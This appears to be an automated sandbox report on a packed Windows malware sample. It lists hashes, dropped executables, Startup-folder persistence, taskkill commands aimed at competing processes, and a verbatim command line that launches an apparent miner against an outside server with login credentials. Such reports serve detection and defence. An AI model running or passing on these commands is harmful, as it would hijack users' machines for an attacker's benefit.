a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32

General

Target

a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
Size

396KB
MD5

5c8169f5cca362ce7c22b25eda15fbd8
SHA1

41999d841d4445d7178b2a8625b273c893482403
SHA256

a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32
SHA512

376e6b0fd4457dfa299db1e83673c56830ae3310d516c9a19d7f42ee4b0c83a640e2b244fc9756d9d6dc9243e9a758de862e10140c6a03d66bd26f8c5520ae3a
SSDEEP

12288:uutrzh9xOXkF91QHrdGwQMu/yvSqi39mU6lnm:uutr5OUFnQZGn/Q9i39mZlnm

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
4740	stepx2.exe
3496	hid.exe
1112	x30811.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000022e71-146.dat	upx
behavioral2/files/0x0006000000022e71-147.dat	upx
behavioral2/memory/1112-148-0x0000000000400000-0x0000000000500000-memory.dmp	upx
behavioral2/memory/1112-149-0x0000000000400000-0x0000000000500000-memory.dmp	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	stepx2.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_240573343	a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe	a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe	a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 3 IoCs

evasion

pid	Process
1352	taskkill.exe
4936	taskkill.exe
1640	taskkill.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4936	taskkill.exe
Token: SeDebugPrivilege	1640	taskkill.exe
Token: SeDebugPrivilege	1352	taskkill.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 4268 wrote to memory of 4740	4268	a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe	81
PID 4268 wrote to memory of 4740	4268	a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe	81
PID 4268 wrote to memory of 4740	4268	a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe	81
PID 4740 wrote to memory of 3496	4740	stepx2.exe	82
PID 4740 wrote to memory of 3496	4740	stepx2.exe	82
PID 4740 wrote to memory of 3496	4740	stepx2.exe	82
PID 3496 wrote to memory of 1296	3496	hid.exe	83
PID 3496 wrote to memory of 1296	3496	hid.exe	83
PID 3496 wrote to memory of 1296	3496	hid.exe	83
PID 1296 wrote to memory of 4936	1296	cmd.exe	86
PID 1296 wrote to memory of 4936	1296	cmd.exe	86
PID 1296 wrote to memory of 4936	1296	cmd.exe	86
PID 1296 wrote to memory of 1640	1296	cmd.exe	87
PID 1296 wrote to memory of 1640	1296	cmd.exe	87
PID 1296 wrote to memory of 1640	1296	cmd.exe	87
PID 1296 wrote to memory of 1352	1296	cmd.exe	88
PID 1296 wrote to memory of 1352	1296	cmd.exe	88
PID 1296 wrote to memory of 1352	1296	cmd.exe	88
PID 1296 wrote to memory of 1112	1296	cmd.exe	89
PID 1296 wrote to memory of 1112	1296	cmd.exe	89
PID 1296 wrote to memory of 1112	1296	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
"C:\Users\Admin\AppData\Local\Temp\a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4268
- C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe
  "C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4740
- - C:\Users\Admin\AppData\Local\Temp\hid.exe
    "C:\Users\Admin\AppData\Local\Temp\hid.exe" /NOCONSOLE yz.bat
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3496
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c yz.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im svchoost.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4936
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im mamita.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1640
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im x11811.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1352
    - - C:\Users\Admin\AppData\Local\Temp\x30811.exe
        
        x30811.exe -a 60 -g yes -o http://y.bethyname.info:8332/ -u redem_guild -p redemxxx5x2 -t 2
        5⤵
        Executes dropped EXE
        
        PID:1112

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\hid.exe

Filesize
43KB

MD5
c1c769d742f88e441ded76bf57a5a45c

SHA1
06872dabd41e70dc4ef8fd5131b334be8a17db3c

SHA256
3e857094c9d89b31676477ce7d8d523f94c767f3cb0769dae99af76b3c4e004b

SHA512
d35478590ab1abee0293589a8b8cc13307afb0a14d7bd01a35388114ace6cb007e0f132e5d90bc5ae90b3e36a3edef67354a94363415cf2a1d3ef5f4ae99636f

Download Submit
C:\Users\Admin\AppData\Local\Temp\hid.exe

Filesize
43KB

MD5
c1c769d742f88e441ded76bf57a5a45c

SHA1
06872dabd41e70dc4ef8fd5131b334be8a17db3c

SHA256
3e857094c9d89b31676477ce7d8d523f94c767f3cb0769dae99af76b3c4e004b

SHA512
d35478590ab1abee0293589a8b8cc13307afb0a14d7bd01a35388114ace6cb007e0f132e5d90bc5ae90b3e36a3edef67354a94363415cf2a1d3ef5f4ae99636f

Download Submit
C:\Users\Admin\AppData\Local\Temp\x30811.exe

Filesize
252KB

MD5
05b0cc5b7cf23668bff73252aee633f4

SHA1
981766824c1ff41a88a9babcf07fdaa6c03cfc64

SHA256
0999ac7185282e800e1d255f510dd4f349ce3c5b21a1a9bb5dc85cfd2a3941f1

SHA512
ca395c530edf615942ad1e2a59e20e4429068dcfee4dc932c89d7200dae58443d9ed4d88a1e1c62dd5b5da9e15389e391011c79e0e05974a9e461134d9c3bc64

Download Submit
C:\Users\Admin\AppData\Local\Temp\x30811.exe

Filesize
252KB

MD5
05b0cc5b7cf23668bff73252aee633f4

SHA1
981766824c1ff41a88a9babcf07fdaa6c03cfc64

SHA256
0999ac7185282e800e1d255f510dd4f349ce3c5b21a1a9bb5dc85cfd2a3941f1

SHA512
ca395c530edf615942ad1e2a59e20e4429068dcfee4dc932c89d7200dae58443d9ed4d88a1e1c62dd5b5da9e15389e391011c79e0e05974a9e461134d9c3bc64

Download Submit
C:\Users\Admin\AppData\Local\Temp\yz.bat

Filesize
177B

MD5
b8c466d2f66004d05f71a5484105e09c

SHA1
0d14cad742e6f2b07d9048b608ad6323986d6564

SHA256
54f81b14c36b97c95717665082984427e61fbd52a36e2ff705a0c64e8415d186

SHA512
91818f7223e530a732b4da1f2adae588a3dad3a9271cf0cd2a8b2b02a724ed01c6570e69836d274db0210c26428215b8ab1d6d15d3a37b47231c2c9a850607e6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe

Filesize
347KB

MD5
f83b54e2d32ef76e9417dbadd228dacb

SHA1
ccad473fbec4c815577d3ceca625e3c0c72dbea8

SHA256
2e8a59f390997f0e63e2b905c423fee9afe93bc31ca7ca253495a2d6f26591b7

SHA512
92bdb15ef0f204bc17f311edfcc52c785bfde99caf0bb60926ff7d8aee94e17979a052ed8b4f8f26565bbbcea4b2d55f10f5913fa67631279683efcb0af8d280

Download Submit
C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe

Filesize
347KB

MD5
f83b54e2d32ef76e9417dbadd228dacb

SHA1
ccad473fbec4c815577d3ceca625e3c0c72dbea8

SHA256
2e8a59f390997f0e63e2b905c423fee9afe93bc31ca7ca253495a2d6f26591b7

SHA512
92bdb15ef0f204bc17f311edfcc52c785bfde99caf0bb60926ff7d8aee94e17979a052ed8b4f8f26565bbbcea4b2d55f10f5913fa67631279683efcb0af8d280

Download Submit
memory/1112-149-0x0000000000400000-0x0000000000500000-memory.dmp

Filesize
1024KB

Download
memory/1112-148-0x0000000000400000-0x0000000000500000-memory.dmp

Filesize
1024KB

Download
memory/4268-132-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4268-136-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download

Analysis

Sharing